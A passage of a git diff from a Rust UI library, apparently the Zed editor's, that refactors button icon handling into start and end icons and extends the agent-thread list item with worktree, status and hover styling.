}) .label_size(LabelSize::Small) - .icon(IconName::Undo) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::Undo) + .size(IconSize::Small) + .color(Color::Muted), + ) .disabled(self.disabled) .when_some(self.tooltip_label, |this, label| { this.tooltip(Tooltip::text(label)) diff --git a/crates/ui/src/components/ai/copilot_configuration_callout.rs b/crates/ui/src/components/ai/copilot_configuration_callout.rs deleted file mode 100644 index 8b137891791fe96927ad78e64b0aad7bded08bdc..0000000000000000000000000000000000000000 --- a/crates/ui/src/components/ai/copilot_configuration_callout.rs +++ /dev/null @@ -1 +0,0 @@ - diff --git a/crates/ui/src/components/ai/thread_item.rs b/crates/ui/src/components/ai/thread_item.rs index 6cc710690ea0103bf2de4253bc405eb52be5af69..7658946b6395d6314d90db52716020a922c85ccc 100644 --- a/crates/ui/src/components/ai/thread_item.rs +++ b/crates/ui/src/components/ai/thread_item.rs @@ -1,9 +1,11 @@ -use crate::{ - DecoratedIcon, DiffStat, HighlightedLabel, IconDecoration, IconDecorationKind, SpinnerLabel, - prelude::*, -}; +use crate::{CommonAnimationExt, DiffStat, GradientFade, HighlightedLabel, Tooltip, prelude::*}; -use gpui::{AnyView, ClickEvent, SharedString}; +use gpui::{ + Animation, AnimationExt, AnyView, ClickEvent, Hsla, MouseButton, SharedString, + pulsating_between, +}; +use itertools::Itertools as _; +use std::{path::PathBuf, sync::Arc, time::Duration}; #[derive(Clone, Copy, Debug, Default, PartialEq, Eq)] pub enum AgentThreadStatus { @@ -14,26 +16,41 @@ pub enum AgentThreadStatus { Error, } +#[derive(Clone)] +pub struct ThreadItemWorktreeInfo { + pub name: SharedString, + pub full_path: SharedString, + pub highlight_positions: Vec, +} + #[derive(IntoElement, RegisterComponent)] pub struct ThreadItem { id: ElementId, icon: IconName, + icon_color: Option, + icon_visible: bool, + custom_icon_from_external_svg: Option, title: SharedString, + title_label_color: Option, + title_generating: bool, + highlight_positions: Vec, timestamp: SharedString, - running: bool, - generation_done: bool, + notified: bool, status: AgentThreadStatus, selected: bool, + focused: bool, hovered: bool, + rounded: bool, added: Option, removed: Option, - worktree: Option, - highlight_positions: Vec, - worktree_highlight_positions: Vec, + project_paths: Option>, + project_name: Option, + worktrees: Vec, on_click: Option>, on_hover: Box, action_slot: Option, tooltip: Option AnyView + 'static>>, + base_bg: Option, } impl ThreadItem { @@ -41,22 +58,31 @@ impl ThreadItem { Self { id: id.into(), icon: IconName::ZedAgent, + icon_color: None, + icon_visible: true, + custom_icon_from_external_svg: None, title: title.into(), + title_label_color: None, + title_generating: false, + highlight_positions: Vec::new(), timestamp: "".into(), - running: false, - generation_done: false, + notified: false, status: AgentThreadStatus::default(), selected: false, + focused: false, hovered: false, + rounded: false, added: None, removed: None, - worktree: None, - highlight_positions: Vec::new(), - worktree_highlight_positions: Vec::new(), + + project_paths: None, + project_name: None, + worktrees: Vec::new(), on_click: None, on_hover: Box::new(|_, _, _| {}), action_slot: None, tooltip: None, + base_bg: None, } } @@ -70,13 +96,23 @@ impl ThreadItem { self } - pub fn running(mut self, running: bool) -> Self { - self.running = running; + pub fn icon_color(mut self, color: Color) -> Self { + self.icon_color = Some(color); + self + } + + pub fn icon_visible(mut self, visible: bool) -> Self { + self.icon_visible = visible; + self + } + + pub fn custom_icon_from_external_svg(mut self, svg: impl Into) -> Self { + self.custom_icon_from_external_svg = Some(svg.into()); self } - pub fn generation_done(mut self, generation_done: bool) -> Self { - self.generation_done = generation_done; + pub fn notified(mut self, notified: bool) -> Self { + self.notified = notified; self } @@ -85,11 +121,31 @@ impl ThreadItem { self } + pub fn title_generating(mut self, generating: bool) -> Self { + self.title_generating = generating; + self + } + + pub fn title_label_color(mut self, color: Color) -> Self { + self.title_label_color = Some(color); + self + } + + pub fn highlight_positions(mut self, positions: Vec) -> Self { + self.highlight_positions = positions; + self + } + pub fn selected(mut self, selected: bool) -> Self { self.selected = selected; self } + pub fn focused(mut self, focused: bool) -> Self { + self.focused = focused; + self + } + pub fn added(mut self, added: usize) -> Self { self.added = Some(added); self @@ -100,18 +156,18 @@ impl ThreadItem { self } - pub fn worktree(mut self, worktree: impl Into) -> Self { - self.worktree = Some(worktree.into()); + pub fn project_paths(mut self, paths: Arc<[PathBuf]>) -> Self { + self.project_paths = Some(paths); self } - pub fn highlight_positions(mut self, positions: Vec) -> Self { - self.highlight_positions = positions; + pub fn project_name(mut self, name: impl Into) -> Self { + self.project_name = Some(name.into()); self } - pub fn worktree_highlight_positions(mut self, positions: Vec) -> Self { - self.worktree_highlight_positions = positions; + pub fn worktrees(mut self, worktrees: Vec) -> Self { + self.worktrees = worktrees; self } @@ -120,6 +176,11 @@ impl ThreadItem { self } + pub fn rounded(mut self, rounded: bool) -> Self { + self.rounded = rounded; + self + } + pub fn on_click( mut self, handler: impl Fn(&ClickEvent, &mut Window, &mut App) + 'static, @@ -142,98 +203,181 @@ impl ThreadItem { self.tooltip = Some(Box::new(tooltip)); self } + + pub fn base_bg(mut self, color: Hsla) -> Self { + self.base_bg = Some(color); + self + } } impl RenderOnce for ThreadItem { fn render(self, _: &mut Window, cx: &mut App) -> impl IntoElement { - let clr = cx.theme().colors(); - // let dot_separator = || { - // Label::new("•") - // .size(LabelSize::Small) - // .color(Color::Muted) - // .alpha(0.5) - // }; - - let icon_container = || h_flex().size_4().justify_center(); - let agent_icon = Icon::new(self.icon) - .color(Color::Muted) - .size(IconSize::Small); - - let decoration = if self.status == AgentThreadStatus::WaitingForConfirmation { - Some( - IconDecoration::new( - IconDecorationKind::Triangle, - cx.theme().colors().surface_background, - cx, - ) - .color(cx.theme().status().warning) - .position(gpui::Point { - x: px(-2.), - y: px(-2.), - }), + let color = cx.theme().colors(); + let sidebar_base_bg = color + .title_bar_background + .blend(color.panel_background.opacity(0.25)); + + let raw_bg = self.base_bg.unwrap_or(sidebar_base_bg); + let apparent_bg = color.background.blend(raw_bg); + + let base_bg = if self.selected { + apparent_bg.blend(color.element_active) + } else { + apparent_bg + }; + + let hover_color = color + .element_active + .blend(color.element_background.opacity(0.2)); + let hover_bg = apparent_bg.blend(hover_color); + + let gradient_overlay = GradientFade::new(base_bg, hover_bg, hover_bg) + .width(px(64.0)) + .right(px(-10.0)) + .gradient_stop(0.75) + .group_name("thread-item"); + + let dot_separator = || { + Label::new("•") + .size(LabelSize::Small) + .color(Color::Muted) + .alpha(0.5) + }; + + let icon_id = format!("icon-{}", self.id); + let icon_visible = self.icon_visible; + let icon_container = || { + h_flex() + .id(icon_id.clone()) + .size_4() + .flex_none() + .justify_center() + .when(!icon_visible, |this| this.invisible()) + }; + let icon_color = self.icon_color.unwrap_or(Color::Muted); + let agent_icon = if let Some(custom_svg) = self.custom_icon_from_external_svg { + Icon::from_external_svg(custom_svg) + .color(icon_color) + .size(IconSize::Small) + } else { + Icon::new(self.icon).color(icon_color).size(IconSize::Small) + }; + + let (status_icon, icon_tooltip) = if self.status == AgentThreadStatus::Error { + ( + Some( + Icon::new(IconName::Close) + .size(IconSize::Small) + .color(Color::Error), + ), + Some("Thread has an Error"), ) - } else if self.status == AgentThreadStatus::Error { - Some( - IconDecoration::new( - IconDecorationKind::X, - cx.theme().colors().surface_background, - cx, - ) - .color(cx.theme().status().error) - .position(gpui::Point { - x: px(-2.), - y: px(-2.), - }), + } else if self.status == AgentThreadStatus::WaitingForConfirmation { + ( + Some( + Icon::new(IconName::Warning) + .size(IconSize::XSmall) + .color(Color::Warning), + ), + Some("Thread is Waiting for Confirmation"), ) - } else if self.generation_done { - Some( - IconDecoration::new( - IconDecorationKind::Dot, - cx.theme().colors().surface_background, - cx, - ) - .color(cx.theme().colors().text_accent) - .position(gpui::Point { - x: px(-2.), - y: px(-2.), - }), + } else if self.notified { + ( + Some( + Icon::new(IconName::Circle) + .size(IconSize::Small) + .color(Color::Accent), + ), + Some("Thread's Generation is Complete"), ) } else { - None + (None, None) }; - let icon = if let Some(decoration) = decoration { - icon_container().child(DecoratedIcon::new(agent_icon, Some(decoration))) + let icon = if self.status == AgentThreadStatus::Running { + icon_container() + .child( + Icon::new(IconName::LoadCircle) + .size(IconSize::Small) + .color(Color::Muted) + .with_rotate_animation(2), + ) + .into_any_element() + } else if let Some(status_icon) = status_icon { + icon_container() + .child(status_icon) + .when_some(icon_tooltip, |icon, tooltip| { + icon.tooltip(Tooltip::text(tooltip)) + }) + .into_any_element() } else { - icon_container().child(agent_icon) + icon_container().child(agent_icon).into_any_element() }; - let running_or_action = self.running || (self.hovered && self.action_slot.is_some()); - - // let has_no_changes = self.added.is_none() && self.removed.is_none(); - let title = self.title; let highlight_positions = self.highlight_positions; - let title_label = if highlight_positions.is_empty() { - Label::new(title).truncate().into_any_element() + + let title_label = if self.title_generating { + Label::new(title) + .color(Color::Muted) + .with_animation( + "generating-title", + Animation::new(Duration::from_secs(2)) + .repeat() + .with_easing(pulsating_between(0.4, 0.8)), + |label, delta| label.alpha(delta), + ) + .into_any_element() + } else if highlight_positions.is_empty() { + Label::new(title) + .when_some(self.title_label_color, |label, color| label.color(color)) + .into_any_element() } else { HighlightedLabel::new(title, highlight_positions) - .truncate() + .when_some(self.title_label_color, |label, color| label.color(color)) .into_any_element() }; + let has_diff_stats = self.added.is_some() || self.removed.is_some(); + let diff_stat_id = self.id.clone(); + let added_count = self.added.unwrap_or(0); + let removed_count = self.removed.unwrap_or(0); + + let project_paths = self.project_paths.as_ref().and_then(|paths| { + let paths_str = paths + .as_ref() + .iter() + .filter_map(|p| p.file_name()) + .filter_map(|name| name.to_str()) + .join(", "); + if paths_str.is_empty() { + None + } else { + Some(paths_str) + } + }); + + let has_project_name = self.project_name.is_some(); + let has_project_paths = project_paths.is_some(); + let has_worktree = !self.worktrees.is_empty(); + let has_timestamp = !self.timestamp.is_empty(); + let timestamp = self.timestamp; + v_flex() .id(self.id.clone()) .cursor_pointer() - .map(|this| { - if self.worktree.is_some() { - this.p_2() - } else { - this.px_2().py_1() - } - }) - .when(self.selected, |s| s.bg(clr.element_active)) - .hover(|s| s.bg(clr.element_hover)) + .group("thread-item") + .relative() + .overflow_hidden() + .w_full() + .py_1() + .px_1p5() + .when(self.selected, |s| s.bg(color.element_active)) + .border_1() + .border_color(gpui::transparent_black()) + .when(self.focused, |s| s.border_color(color.border_focused)) + .when(self.rounded, |s| s.rounded_sm()) + .hover(|s| s.bg(hover_color)) .on_hover(self.on_hover) .child( h_flex() @@ -251,72 +395,149 @@ impl RenderOnce for ThreadItem { .child(title_label) .when_some(self.tooltip, |this, tooltip| this.tooltip(tooltip)), ) - .when(running_or_action, |this| { - this.child( + .child(gradient_overlay) + .when(self.hovered, |this| { + this.when_some(self.action_slot, |this, slot| { + let overlay = GradientFade::new(base_bg, hover_bg, hover_bg) + .width(px(64.0)) + .right(px(6.)) + .gradient_stop(0.75) + .group_name("thread-item"); + + this.child( + h_flex() + .relative() + .on_mouse_down(MouseButton::Left, |_, _, cx| { + cx.stop_propagation() + }) + .child(overlay) + .child(slot), + ) + }) + }), + ) + .when( + has_project_name + || has_project_paths + || has_worktree + || has_diff_stats + || has_timestamp, + |this| { + // Collect all full paths for the shared tooltip. + let worktree_tooltip: SharedString = self + .worktrees + .iter() + .map(|wt| wt.full_path.as_ref()) + .collect::>() + .join("\n") + .into(); + + let worktree_tooltip_title = if self.worktrees.len() > 1 { + "Thread Running in Local Git Worktrees" + } else { + "Thread Running in a Local Git Worktree" + }; + + // Deduplicate chips by name — e.g. two paths both named + // "olivetti" produce a single chip. Highlight positions + // come from the first occurrence. + let mut seen_names: Vec = Vec::new(); + let mut worktree_labels: Vec = Vec::new(); + + for wt in self.worktrees { + if seen_names.contains(&wt.name) { + continue; + } + + let chip_index = seen_names.len(); + seen_names.push(wt.name.clone()); + + let label = if wt.highlight_positions.is_empty() { + Label::new(wt.name) + .size(LabelSize::Small) + .color(Color::Muted) + .into_any_element() + } else { + HighlightedLabel::new(wt.name, wt.highlight_positions) + .size(LabelSize::Small) + .color(Color::Muted) + .into_any_element() + }; + let tooltip_title = worktree_tooltip_title; + let tooltip_meta = worktree_tooltip.clone(); + + worktree_labels.push( h_flex() - .gap_1() - .when(self.running, |this| { - this.child( - icon_container() - .child(SpinnerLabel::new().color(Color::Accent)), + .id(format!("{}-worktree-{chip_index}", self.id.clone())) + .gap_0p5() + .child( + Icon::new(IconName::GitWorktree) + .size(IconSize::XSmall) + .color(Color::Muted), + ) + .child(label) + .tooltip(move |_, cx| { + Tooltip::with_meta( + tooltip_title, + None, + tooltip_meta.clone(), + cx, ) }) - .when(self.hovered, |this| { - this.when_some(self.action_slot, |this, slot| this.child(slot)) - }), - ) - }), + .into_any_element(), + ); + } + + this.child( + h_flex() + .min_w_0() + .gap_1p5() + .child(icon_container()) // Icon Spacing + .when_some(self.project_name, |this, name| { + this.child( + Label::new(name).size(LabelSize::Small).color(Color::Muted), + ) + }) + .when( + has_project_name && (has_project_paths || has_worktree), + |this| this.child(dot_separator()), + ) + .when_some(project_paths, |this, paths| { + this.child( + Label::new(paths) + .size(LabelSize::Small) + .color(Color::Muted) + .into_any_element(), + ) + }) + .when(has_project_paths && has_worktree, |this| { + this.child(dot_separator()) + }) + .children(worktree_labels) + .when( + (has_project_name || has_project_paths || has_worktree) + && (has_diff_stats || has_timestamp), + |this| this.child(dot_separator()), + ) + .when(has_diff_stats, |this| { + this.child( + DiffStat::new(diff_stat_id, added_count, removed_count) + .tooltip("Unreviewed Changes"), + ) + }) + .when(has_diff_stats && has_timestamp, |this| { + this.child(dot_separator()) + }) + .when(has_timestamp, |this| { + this.child( + Label::new(timestamp.clone()) + .size(LabelSize::Small) + .color(Color::Muted), + ) + }), + ) + }, ) - .when_some(self.worktree, |this, worktree| { - let worktree_highlight_positions = self.worktree_highlight_positions; - let worktree_label = if worktree_highlight_positions.is_empty() { - Label::new(worktree) - .size(LabelSize::Small) - .color(Color::Muted) - .truncate_start() - .into_any_element() - } else { - HighlightedLabel::new(worktree, worktree_highlight_positions) - .size(LabelSize::Small) - .color(Color::Muted) - .into_any_element() - }; - - this.child( - h_flex() - .min_w_0() - .gap_1p5() - .child(icon_container()) // Icon Spacing - .child(worktree_label) - // TODO: Uncomment the elements below when we're ready to expose this data - // .child(dot_separator()) - // .child( - // Label::new(self.timestamp) - // .size(LabelSize::Small) - // .color(Color::Muted), - // ) - // .child( - // Label::new("•") - // .size(LabelSize::Small) - // .color(Color::Muted) - // .alpha(0.5), - // ) - // .when(has_no_changes, |this| { - // this.child( - // Label::new("No Changes") - // .size(LabelSize::Small) - // .color(Color::Muted), - // ) - // }) - .when(self.added.is_some() || self.removed.is_some(), |this| { - this.child(DiffStat::new( - self.id, - self.added.unwrap_or(0), - self.removed.unwrap_or(0), - )) - }), - ) - }) .when_some(self.on_click, |this, on_click| this.on_click(on_click)) } } @@ -327,32 +548,37 @@ impl Component for ThreadItem { } fn preview(_window: &mut Window, cx: &mut App) -> Option { + let color = cx.theme().colors(); + let bg = color + .title_bar_background + .blend(color.panel_background.opacity(0.25)); + let container = || { v_flex() .w_72() .border_1() - .border_color(cx.theme().colors().border_variant) - .bg(cx.theme().colors().panel_background) + .border_color(color.border_variant) + .bg(bg) }; let thread_item_examples = vec![ single_example( - "Default", + "Default (minutes)", container() .child( ThreadItem::new("ti-1", "Linking to the Agent Panel Depending on Settings") .icon(IconName::AiOpenAi) - .timestamp("1:33 AM"), + .timestamp("15m"), ) .into_any_element(), ), single_example( - "Generation Done", + "Notified (weeks)", container() .child( ThreadItem::new("ti-2", "Refine thread view scrolling behavior") - .timestamp("12:12 AM") - .generation_done(true), + .timestamp("1w") + .notified(true), ) .into_any_element(), ), @@ -361,7 +587,7 @@ impl Component for ThreadItem { container() .child( ThreadItem::new("ti-2b", "Execute shell command in terminal") - .timestamp("12:15 AM") + .timestamp("2h") .status(AgentThreadStatus::WaitingForConfirmation), ) .into_any_element(), @@ -371,7 +597,7 @@ impl Component for ThreadItem { container() .child( ThreadItem::new("ti-2c", "Failed to connect to language server") - .timestamp("12:20 AM") + .timestamp("5h") .status(AgentThreadStatus::Error), ) .into_any_element(), @@ -382,8 +608,8 @@ impl Component for ThreadItem { .child( ThreadItem::new("ti-3", "Add line numbers option to FileEditBlock") .icon(IconName::AiClaude) - .timestamp("7:30 PM") - .running(true), + .timestamp("23h") + .status(AgentThreadStatus::Running), ) .into_any_element(), ), @@ -393,34 +619,120 @@ impl Component for ThreadItem { .child( ThreadItem::new("ti-4", "Add line numbers option to FileEditBlock") .icon(IconName::AiClaude) - .timestamp("7:37 PM") - .worktree("link-agent-panel"), + .timestamp("2w") + .worktrees(vec![ThreadItemWorktreeInfo { + name: "link-agent-panel".into(), + full_path: "link-agent-panel".into(), + highlight_positions: Vec::new(), + }]), ) .into_any_element(), ), single_example( - "With Changes", + "With Changes (months)", container() .child( ThreadItem::new("ti-5", "Managing user and project settings interactions") .icon(IconName::AiClaude) - .timestamp("7:37 PM") + .timestamp("1mo") .added(10) .removed(3), ) .into_any_element(), ), + single_example( + "Worktree + Changes + Timestamp", + container() + .child( + ThreadItem::new("ti-5b", "Full metadata example") + .icon(IconName::AiClaude) + .worktrees(vec![ThreadItemWorktreeInfo { + name: "my-project".into(), + full_path: "my-project".into(), + highlight_positions: Vec::new(), + }]) + .added(42) + .removed(17) + .timestamp("3w"), + ) + .into_any_element(), + ), single_example( "Selected Item", container() .child( ThreadItem::new("ti-6", "Refine textarea interaction behavior") .icon(IconName::AiGemini) - .timestamp("3:00 PM") + .timestamp("45m") .selected(true), ) .into_any_element(), ), + single_example( + "Focused Item (Keyboard Selection)", + container() + .child( + ThreadItem::new("ti-7", "Implement keyboard navigation") + .icon(IconName::AiClaude) + .timestamp("12h") + .focused(true), + ) + .into_any_element(), + ), + single_example( + "Selected + Focused", + container() + .child( + ThreadItem::new("ti-8", "Active and keyboard-focused thread") + .icon(IconName::AiGemini) + .timestamp("2mo") + .selected(true) + .focused(true), + ) + .into_any_element(), + ), + single_example( + "Hovered with Action Slot", + container() + .child( + ThreadItem::new("ti-9", "Hover to see action button") + .icon(IconName::AiClaude) + .timestamp("6h") + .hovered(true) + .action_slot( + IconButton::new("delete", IconName::Trash) + .icon_size(IconSize::Small) + .icon_color(Color::Muted), + ), + ) + .into_any_element(), + ), + single_example( + "Search Highlight", + container() + .child( + ThreadItem::new("ti-10", "Implement keyboard navigation") + .icon(IconName::AiClaude) + .timestamp("4w") + .highlight_positions(vec![0, 1, 2, 3, 4, 5, 6, 7, 8, 9]), + ) + .into_any_element(), + ), + single_example( + "Worktree Search Highlight", + container() + .child( + ThreadItem::new("ti-11", "Search in worktree name") + .icon(IconName::AiClaude) + .timestamp("3mo") + .worktrees(vec![ThreadItemWorktreeInfo { + name: "my-project-name".into(), + full_path: "my-project-name".into(), + highlight_positions: vec![3, 4, 5, 6, 7, 8, 9, 10, 11], + }]), + ) + .into_any_element(), + ), ]; Some( diff --git a/crates/ui/src/components/banner.rs b/crates/ui/src/components/banner.rs index 199c72113afae37ab97c96932f5b9e805c5628bd..19795c2c7c86045572ac4a031276a6552a1d68ee 100644 --- a/crates/ui/src/components/banner.rs +++ b/crates/ui/src/components/banner.rs @@ -8,16 +8,14 @@ use gpui::{AnyElement, IntoElement, ParentElement, Styled}; /// /// ``` /// use ui::prelude::*; -/// use ui::{Banner, Button, IconName, IconPosition, IconSize, Label, Severity}; +/// use ui::{Banner, Button, Icon, IconName, IconSize, Label, Severity}; /// /// Banner::new() /// .severity(Severity::Success) /// .children([Label::new("This is a success message")]) /// .action_slot( /// Button::new("learn-more", "Learn More") -/// .icon(IconName::ArrowUpRight) -/// .icon_size(IconSize::Small) -/// .icon_position(IconPosition::End) +/// .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::Small)), /// ); /// ``` #[derive(IntoElement, RegisterComponent)] @@ -151,9 +149,7 @@ impl Component for Banner { .child(Label::new("This is an informational message")) .action_slot( Button::new("learn-more", "Learn More") - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_position(IconPosition::End), + .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::Small)), ) .into_any_element(), ), diff --git a/crates/ui/src/components/button.rs b/crates/ui/src/components/button.rs index 17c216ec7b000bd9b563b3e00d4ee9979ca5287f..bcec46e59ce66a242cbd96d840e4323751541f92 100644 --- a/crates/ui/src/components/button.rs +++ b/crates/ui/src/components/button.rs @@ -1,5 +1,4 @@ mod button; -mod button_icon; mod button_like; mod button_link; mod copy_button; diff --git a/crates/ui/src/components/button/button.rs b/crates/ui/src/components/button/button.rs index 2ac3b9ca13123a0d9330d71e8b73d034d65faf89..a3636285999eabe1491ca004241c58669321cf5a 100644 --- a/crates/ui/src/components/button/button.rs +++ b/crates/ui/src/components/button/button.rs @@ -2,15 +2,13 @@ use crate::component_prelude::*; use gpui::{AnyElement, AnyView, DefiniteLength}; use ui_macros::RegisterComponent; -use crate::{ButtonCommon, ButtonLike, ButtonSize, ButtonStyle, IconName, IconSize, Label}; +use crate::traits::animation_ext::CommonAnimationExt; +use crate::{ButtonCommon, ButtonLike, ButtonSize, ButtonStyle, Icon, Label}; use crate::{ - Color, DynamicSpacing, ElevationIndex, IconPosition, KeyBinding, KeybindingPosition, TintColor, - prelude::*, + Color, DynamicSpacing, ElevationIndex, KeyBinding, KeybindingPosition, TintColor, prelude::*, }; -use super::button_icon::ButtonIcon; - -/// An element that creates a button with a label and an optional icon. +/// An element that creates a button with a label and optional icons. /// /// Common buttons: /// - Label, Icon + Label: [`Button`] (this component) @@ -42,7 +40,7 @@ use super::button_icon::ButtonIcon; /// use ui::prelude::*; /// /// Button::new("button_id", "Click me!") -/// .icon(IconName::Check) +/// .start_icon(Icon::new(IconName::Check)) /// .toggle_state(true) /// .on_click(|event, window, cx| { /// // Handle click event @@ -85,16 +83,13 @@ pub struct Button { label_size: Option, selected_label: Option, selected_label_color: Option, - icon: Option, - icon_position: Option, - icon_size: Option, - icon_color: Option, - selected_icon: Option, - selected_icon_color: Option, + start_icon: Option, + end_icon: Option, key_binding: Option, key_binding_position: KeybindingPosition, alpha: Option, truncate: bool, + loading: bool, } impl Button { @@ -112,16 +107,13 @@ impl Button { label_size: None, selected_label: None, selected_label_color: None, - icon: None, - icon_position: None, - icon_size: None, - icon_color: None, - selected_icon: None, - selected_icon_color: None, + start_icon: None, + end_icon: None, key_binding: None, key_binding_position: KeybindingPosition::default(), alpha: None, truncate: false, + loading: false, } } @@ -149,39 +141,19 @@ impl Button { self } - /// Assigns an icon to the button. - pub fn icon(mut self, icon: impl Into>) -> Self { - self.icon = icon.into(); - self - } - - /// Sets the position of the icon relative to the label. - pub fn icon_position(mut self, icon_position: impl Into>) -> Self { - self.icon_position = icon_position.into(); - self - } - - /// Specifies the size of the button's icon. - pub fn icon_size(mut self, icon_size: impl Into>) -> Self { - self.icon_size = icon_size.into(); - self - } - - /// Sets the color of the button's icon. - pub fn icon_color(mut self, icon_color: impl Into>) -> Self { - self.icon_color = icon_color.into(); - self - } - - /// Chooses an icon to display when the button is in a selected state. - pub fn selected_icon(mut self, icon: impl Into>) -> Self { - self.selected_icon = icon.into(); + /// Sets an icon to display at the start (left) of the button label. + /// + /// The icon's color will be overridden to `Color::Disabled` when the button is disabled. + pub fn start_icon(mut self, icon: impl Into>) -> Self { + self.start_icon = icon.into(); self } - /// Sets the icon color used when the button is in a selected state. - pub fn selected_icon_color(mut self, color: impl Into>) -> Self { - self.selected_icon_color = color.into(); + /// Sets an icon to display at the end (right) of the button label. + /// + /// The icon's color will be overridden to `Color::Disabled` when the button is disabled. + pub fn end_icon(mut self, icon: impl Into>) -> Self { + self.end_icon = icon.into(); self } @@ -214,27 +186,37 @@ impl Button { self.truncate = truncate; self } + + /// Displays a rotating loading spinner in place of the `start_icon`. + /// + /// When `loading` is `true`, any `start_icon` is ignored. and a rotating + pub fn loading(mut self, loading: bool) -> Self { + self.loading = loading; + self + } } impl Toggleable for Button { /// Sets the selected state of the button. /// - /// This method allows the selection state of the button to be specified. - /// It modifies the button's appearance to reflect its selected state. - /// /// # Examples /// + /// Create a toggleable button that changes appearance when selected: + /// /// ``` /// use ui::prelude::*; + /// use ui::TintColor; /// - /// Button::new("button_id", "Click me!") - /// .toggle_state(true) + /// let selected = true; + /// + /// Button::new("toggle_button", "Toggle Me") + /// .start_icon(Icon::new(IconName::Check)) + /// .toggle_state(selected) + /// .selected_style(ButtonStyle::Tinted(TintColor::Accent)) /// .on_click(|event, window, cx| { - /// // Handle click event + /// // Toggle the selected state /// }); /// ``` - /// - /// Use [`selected_style`](Button::selected_style) to change the style of the button when it is selected. fn toggle_state(mut self, selected: bool) -> Self { self.base = self.base.toggle_state(selected); self @@ -242,22 +224,20 @@ impl Toggleable for Button { } impl SelectableButton for Button { - /// Sets the style for the button when selected. + /// Sets the style for the button in a selected state. /// /// # Examples /// + /// Customize the selected appearance of a button: + /// /// ``` /// use ui::prelude::*; /// use ui::TintColor; /// - /// Button::new("button_id", "Click me!") + /// Button::new("styled_button", "Styled Button") /// .toggle_state(true) - /// .selected_style(ButtonStyle::Tinted(TintColor::Accent)) - /// .on_click(|event, window, cx| { - /// // Handle click event - /// }); + /// .selected_style(ButtonStyle::Tinted(TintColor::Accent)); /// ``` - /// This results in a button with a blue tinted background when selected. fn selected_style(mut self, style: ButtonStyle) -> Self { self.base = self.base.selected_style(style); self @@ -265,36 +245,27 @@ impl SelectableButton for Button { } impl Disableable for Button { - /// Disables the button. + /// Disables the button, preventing interaction and changing its appearance. /// - /// This method allows the button to be disabled. When a button is disabled, - /// it doesn't react to user interactions and its appearance is updated to reflect this. + /// When disabled, the button's icon and label will use `Color::Disabled`. /// /// # Examples /// + /// Create a disabled button: + /// /// ``` /// use ui::prelude::*; /// - /// Button::new("button_id", "Click me!") - /// .disabled(true) - /// .on_click(|event, window, cx| { - /// // Handle click event - /// }); + /// Button::new("disabled_button", "Can't Click Me") + /// .disabled(true); /// ``` - /// - /// This results in a button that is disabled and does not respond to click events. fn disabled(mut self, disabled: bool) -> Self { self.base = self.base.disabled(disabled); - self.key_binding = self - .key_binding - .take() - .map(|binding| binding.disabled(disabled)); self } } impl Clickable for Button { - /// Sets the click event handler for the button. fn on_click( mut self, handler: impl Fn(&gpui::ClickEvent, &mut Window, &mut App) + 'static, @@ -310,44 +281,35 @@ impl Clickable for Button { } impl FixedWidth for Button { - /// Sets a fixed width for the button. - /// - /// This function allows a button to have a fixed width instead of automatically growing or shrinking. /// Sets a fixed width for the button. /// /// # Examples /// + /// Create a button with a fixed width of 100 pixels: + /// /// ``` /// use ui::prelude::*; /// - /// Button::new("button_id", "Click me!") - /// .width(px(100.)) - /// .on_click(|event, window, cx| { - /// // Handle click event - /// }); + /// Button::new("fixed_width_button", "Fixed Width") + /// .width(px(100.0)); /// ``` - /// - /// This sets the button's width to be exactly 100 pixels. fn width(mut self, width: impl Into) -> Self { self.base = self.base.width(width); self } - /// Sets the button to occupy the full width of its container. + /// Makes the button take up the full width of its container. /// /// # Examples /// + /// Create a button that takes up the full width of its container: + /// /// ``` /// use ui::prelude::*; /// - /// Button::new("button_id", "Click me!") - /// .full_width() - /// .on_click(|event, window, cx| { - /// // Handle click event - /// }); + /// Button::new("full_width_button", "Full Width") + /// .full_width(); /// ``` - /// - /// This stretches the button to the full width of its container. fn full_width(mut self) -> Self { self.base = self.base.full_width(); self @@ -355,43 +317,34 @@ impl FixedWidth for Button { } impl ButtonCommon for Button { - /// Sets the button's id. fn id(&self) -> &ElementId { self.base.id() } - /// Sets the visual style of the button using a [`ButtonStyle`]. + /// Sets the visual style of the button. fn style(mut self, style: ButtonStyle) -> Self { self.base = self.base.style(style); self } - /// Sets the button's size using a [`ButtonSize`]. + /// Sets the size of the button. fn size(mut self, size: ButtonSize) -> Self { self.base = self.base.size(size); self } - /// Sets a tooltip for the button. - /// - /// This method allows a tooltip to be set for the button. The tooltip is a function that - /// takes a mutable references to [`Window`] and [`App`], and returns an [`AnyView`]. The - /// tooltip is displayed when the user hovers over the button. + /// Sets a tooltip that appears on hover. /// /// # Examples /// - /// ``` - /// use ui::prelude::*; - /// use ui::Tooltip; + /// Add a tooltip to a button: /// - /// Button::new("button_id", "Click me!") - /// .tooltip(Tooltip::text("This is a tooltip")) - /// .on_click(|event, window, cx| { - /// // Handle click event - /// }); /// ``` + /// use ui::{Tooltip, prelude::*}; /// - /// This will create a button with a tooltip that displays "This is a tooltip" when hovered over. + /// Button::new("tooltip_button", "Hover Me") + /// .tooltip(Tooltip::text("This is a tooltip")); + /// ``` fn tooltip(mut self, tooltip: impl Fn(&mut Window, &mut App) -> AnyView + 'static) -> Self { self.base = self.base.tooltip(tooltip); self @@ -436,16 +389,22 @@ impl RenderOnce for Button { h_flex() .when(self.truncate, |this| this.min_w_0().overflow_hidden()) .gap(DynamicSpacing::Base04.rems(cx)) - .when(self.icon_position == Some(IconPosition::Start), |this| { - this.children(self.icon.map(|icon| { - ButtonIcon::new(icon) - .disabled(is_disabled) - .toggle_state(is_selected) - .selected_icon(self.selected_icon) - .selected_icon_color(self.selected_icon_color) - .size(self.icon_size) - .color(self.icon_color) - })) + .when(self.loading, |this| { + this.child( + Icon::new(IconName::LoadCircle) + .size(IconSize::Small) + .color(Color::Muted) + .with_rotate_animation(2), + ) + }) + .when(!self.loading, |this| { + this.when_some(self.start_icon, |this, icon| { + this.child(if is_disabled { + icon.color(Color::Disabled) + } else { + icon + }) + }) }) .child( h_flex() @@ -465,16 +424,12 @@ impl RenderOnce for Button { ) .children(self.key_binding), ) - .when(self.icon_position != Some(IconPosition::Start), |this| { - this.children(self.icon.map(|icon| { - ButtonIcon::new(icon) - .disabled(is_disabled) - 